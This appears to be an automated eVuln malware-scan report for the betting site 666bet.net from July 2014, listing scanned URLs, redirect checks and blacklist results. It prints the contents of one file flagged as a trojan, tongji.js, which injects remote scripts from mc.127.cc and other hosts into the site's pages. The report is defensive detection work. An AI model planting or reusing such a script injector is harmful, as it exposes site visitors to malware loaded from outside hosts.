Malware Scanner report for 666bet.net

Malicious/Suspicious/Total urls checked: 1/0/20

1 page has malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/4

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://666bet.net/	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:27 GMT Location: http://www.666bet.net/ Server: nginx Content-Length: 178 Content-Type: text/html	clean
http://www.666bet.net/	200 OK Content-Length: 20223 Content-Type: text/html	clean
http://www.666bet.net/include/dedeajax2.js	200 OK Content-Length: 6902 Content-Type: application/x-javascript	clean
http://666bet.net/images/js/j.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:30 GMT Location: http://www.666bet.net/images/js/j.js Server: nginx Content-Length: 178 Content-Type: text/html	clean
http://www.666bet.net/images/js/j.js	200 OK Content-Length: 31018 Content-Type: application/x-javascript	clean
http://666bet.net/templets/default/js/pic_scroll.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:32 GMT Location: http://www.666bet.net/templets/default/js/pic_scroll.js Server: nginx Content-Length: 178 Content-Type: text/html	clean
http://www.666bet.net/templets/default/js/pic_scroll.js	200 OK Content-Length: 3762 Content-Type: application/x-javascript	clean
http://666bet.net/templets/default/js/jquery.cookie.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:33 GMT Location: http://www.666bet.net/templets/default/js/jquery.cookie.js Server: nginx Content-Length: 178 Content-Type: text/html	clean
http://www.666bet.net/templets/default/js/jquery.cookie.js	200 OK Content-Length: 4246 Content-Type: application/x-javascript	clean
http://666bet.net/templets/default/js/changeSkin.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 09 Jul 2014 18:35:34 GMT Location: http://www.666bet.net/templets/default/js/changeSkin.js Server: nginx Content-Length: 178 Content-Type: text/html	clean
http://www.666bet.net/templets/default/js/changeskin.js	200 OK Content-Length: 1555 Content-Type: text/html	clean
http://www.666bet.net/list-37.html	200 OK Content-Length: 16044 Content-Type: text/html	clean
http://www.666bet.net/templets/default/js/changeSkin.js	200 OK Content-Length: 693 Content-Type: application/x-javascript	clean
http://www.kbw888.com/m/pic_700x60.js	200 OK Content-Length: 534 Content-Type: application/x-javascript	clean
http://www.kbw888.com/m/pic_960x60.js	200 OK Content-Length: 510 Content-Type: application/x-javascript	clean
http://www.kbw888.com/m/pic_960x60_2.js	200 OK Content-Length: 5177 Content-Type: application/x-javascript	clean
http://www.kbw888.com/m/pic_960x60_3.js	200 OK Content-Length: 516 Content-Type: application/x-javascript	clean
http://js.users.51.la/4394681.js	200 OK Content-Length: 1977 Content-Type: application/x-javascript	clean
http://www.666bet.net/tongji.js	200 OK Content-Length: 377 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<script src="http://mc.127.cc/domain4.js" language="JavaScript" type="text\/javascript"><\/sc'+'ript>'); document.write('<script src="http://js.users.51.la/15988435.js" language="JavaScript" type="text\/javascript"><\/sc'+'ript>'); document.write('<script src="http://js.users.51.la/4394681.js" language="JavaScript" type="text\/javascript"><\/sc'+'ript>'); Antivirus reports: Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/IframeRef.J
http://www.bocainetom/m/pic_fly.js	500 Can't connect to www.bocainetom:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 666bet.net

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 09 Jul 2014 18:35:27 GMT
Location: http://www.666bet.net/
Server: nginx
Content-Length: 178
Content-Type: text/html

...178 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: 666bet.net
Referer: http://www.google.com/search?q=666bet.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=666bet.net

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://666bet.net/

Result: 666bet.net is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for 666bet.net

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools